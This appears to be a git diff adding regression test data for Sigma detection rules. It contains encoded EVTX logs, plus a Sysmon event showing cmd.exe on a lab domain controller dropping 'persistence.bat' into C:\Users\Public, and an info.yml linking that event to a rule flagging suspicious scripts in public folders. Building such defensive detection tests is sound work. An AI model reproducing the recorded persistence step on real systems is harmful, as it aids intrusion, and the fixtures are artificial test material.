0000000000000000000000000000000000000000..5c79f4658ca7a5c1eff9e455aaf469fa8080bf40 GIT binary patch literal 69632 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 literal 0 HcmV?d00001 diff --git a/regression_data/windows/file/file_event/file_event_win_susp_public_folder_extension/b447f7de-1e53-4cbf-bfb4-f1f6d0b04e4e.json b/regression_data/windows/file/file_event/file_event_win_susp_public_folder_extension/b447f7de-1e53-4cbf-bfb4-f1f6d0b04e4e.json new file mode 100644 index 000000000..1895a93a5 --- /dev/null +++ b/regression_data/windows/file/file_event/file_event_win_susp_public_folder_extension/b447f7de-1e53-4cbf-bfb4-f1f6d0b04e4e.json @@ -0,0 +1,51 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 11, + "Version": 2, + "Level": 4, + "Task": 11, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-24T23:52:38.278829Z" + } + }, + "EventRecordID": 74174, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-24 23:52:38.276", + "ProcessGuid": "5AA13A44-0C90-68FC-BF1D-000000004002", + "ProcessId": 10048, + "Image": "C:\\Windows\\system32\\cmd.exe", + "TargetFilename": "C:\\Users\\Public\\persistence.bat", + "CreationUtcTime": "2025-10-24 23:52:38.276", + "User": "ATTACKRANGE\\Administrator" + } + } +} diff --git a/regression_data/windows/file/file_event/file_event_win_susp_public_folder_extension/info.yml b/regression_data/windows/file/file_event/file_event_win_susp_public_folder_extension/info.yml new file mode 100644 index 000000000..4886f7841 --- /dev/null +++ b/regression_data/windows/file/file_event/file_event_win_susp_public_folder_extension/info.yml @@ -0,0 +1,13 @@ +id: 9556b96b-462a-4238-a0bf-5e11ff0408fe +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: b447f7de-1e53-4cbf-bfb4-f1f6d0b04e4e + title: Suspicious Binaries and Scripts in Public Folder +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/file/file_event/file_event_win_susp_public_folder_extension/b447f7de-1e53-4cbf-bfb4-f1f6d0b04e4e.evtx diff --git a/regression_data/windows/file/file_event/file_event_win_susp_recycle_bin_fake_exec/cd8b36ac-8e4a-4c2f-a402-a29b8fbd5bca.evtx b/regression_data/windows/file/file_event/file_event_win_susp_recycle_bin_fake_exec/cd8b36ac-8e4a-4c2f-a402-a29b8fbd5bca.evtx new file mode 100644 index 0000000000000000000000000000000000000000..17b2b288be2b505d73331f293c561327022b3a9b GIT binary patch literal 69632 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

awOLy4UUwp$B_2}=cc>rg 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 